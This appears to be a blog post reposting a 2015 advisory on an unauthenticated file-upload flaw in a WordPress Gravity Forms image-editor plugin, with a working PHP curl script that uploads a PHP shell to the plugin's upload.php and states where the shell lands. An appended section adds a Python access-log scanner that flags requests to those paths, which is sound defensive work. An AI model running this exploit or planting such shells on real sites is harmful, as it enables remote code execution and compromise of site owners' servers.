Assalamualaikum,
This time I want to share the exploit for the WordPress Aviary Image Editor Add On For Gravity Forms 3.0 Beta Shell Upload Vulnerability, so let's get straight to it :D
= Author: Larry W. Cashdollar, @_larry0
= Date: 2015-06-07
= Download Site: https://wordpress.org/plugins/aviary-image-editor-add-on-for-gravity-forms
= Vendor: Waters Edge Web Design and NetherWorks LLC
= Vendor Notified: 2015-06-08
= Advisory: http://www.vapid.dhs.org/advisory.php?v=125
= Vulnerability in 'upload.php': BLANK Page
=======================================================================
Vulnerability:
There is a remote file upload vulnerability in aviary-image-editor-add-on-for-gravity-forms/includes/upload.php as an unauthenticated user can upload any file to the system, including a .php file. The upload.php doesn't check that the user is authenticated and a simple post will allow arbitrary code to be uploaded to the server.
Exploit Code :
<?php
/*Remote shell upload exploit for aviary-image-editor-add-on-for-gravity-forms v3.0beta */
/*Larry W. Cashdollar @_larry0
6/7/2015
shell will be located http://www.vapidlabs.com/wp-content/uploads/gform_aviary/_shell.php
*/
$target_url = 'http://www.vapidlabs.com/wp-content/plugins/aviary-image-editor-add-on-for-gravity-forms/includes/upload.php';
$file_name_with_full_path = '/var/www/nameshell.php';
echo "POST to $target_url $file_name_with_full_path";
$post = array('name' => 'nameshell.php','gf_aviary_file'=>'@'.$file_name_with_full_path);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,$target_url);
curl_setopt($ch, CURLOPT_POST,1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
$result=curl_exec ($ch);
curl_close ($ch);
echo "<hr>";
echo $result;
echo "<hr>";
?>
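Added example (not part of the advisory or of the original post): a Python check that scans a web server access log for POST requests to the plugin's upload.php and for requests to script files under wp-content/uploads/gform_aviary/, the two paths named above. The Combined Log Format, the extension list, the function name scan and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Paths named in the advisory above.
UPLOAD_ENDPOINT = ("/wp-content/plugins/aviary-image-editor-add-on-for-gravity-forms"
                   "/includes/upload.php")
UPLOAD_DIR = "/wp-content/uploads/gform_aviary/"
# Assumed list of extensions the server may execute; adjust to your handler config.
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)$", re.IGNORECASE)
# Combined Log Format (assumed): ip ident user [time] "METHOD target PROTO" status ...
LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')

def scan(lines):
    """Return (kind, ip, time, path, status) for every suspicious request."""
    findings = []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # not an access-log line in the expected format
        ip, when, method, target, status = m.groups()
        # Drop the query string, decode %XX escapes, collapse repeated slashes.
        path = re.sub(r"/{2,}", "/", unquote(target.split("?", 1)[0]))
        norm = path.lower()
        if method == "POST" and norm == UPLOAD_ENDPOINT:
            findings.append(("upload-endpoint-post", ip, when, path, int(status)))
        elif norm.startswith(UPLOAD_DIR) and SCRIPT_EXT.search(norm):
            findings.append(("script-in-upload-dir", ip, when, path, int(status)))
    return findings

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [08/Jun/2015:10:01:12 +0000] "GET /wp-login.php HTTP/1.1" 200 2311 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [08/Jun/2015:10:02:40 +0000] "POST /wp-content/plugins/aviary-image-editor-add-on-for-gravity-forms/includes/upload.php HTTP/1.1" 200 58 "-" "-"',
    '198.51.100.23 - - [08/Jun/2015:10:02:44 +0000] "GET /wp-content/uploads/gform_aviary/_example.php?x=1 HTTP/1.1" 200 17 "-" "-"',
    '203.0.113.7 - - [08/Jun/2015:10:03:01 +0000] "GET /wp-content/uploads/gform_aviary/_photo.jpg HTTP/1.1" 200 48211 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(*finding, sep="  ")
```

A POST to the endpoint on its own is only a lead, on the assumption that the plugin's normal image uploads reach the same file; a 200 response for a script under the upload directory is the stronger signal.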
That's all, and thank you,
Wassalamualaikum wr.wb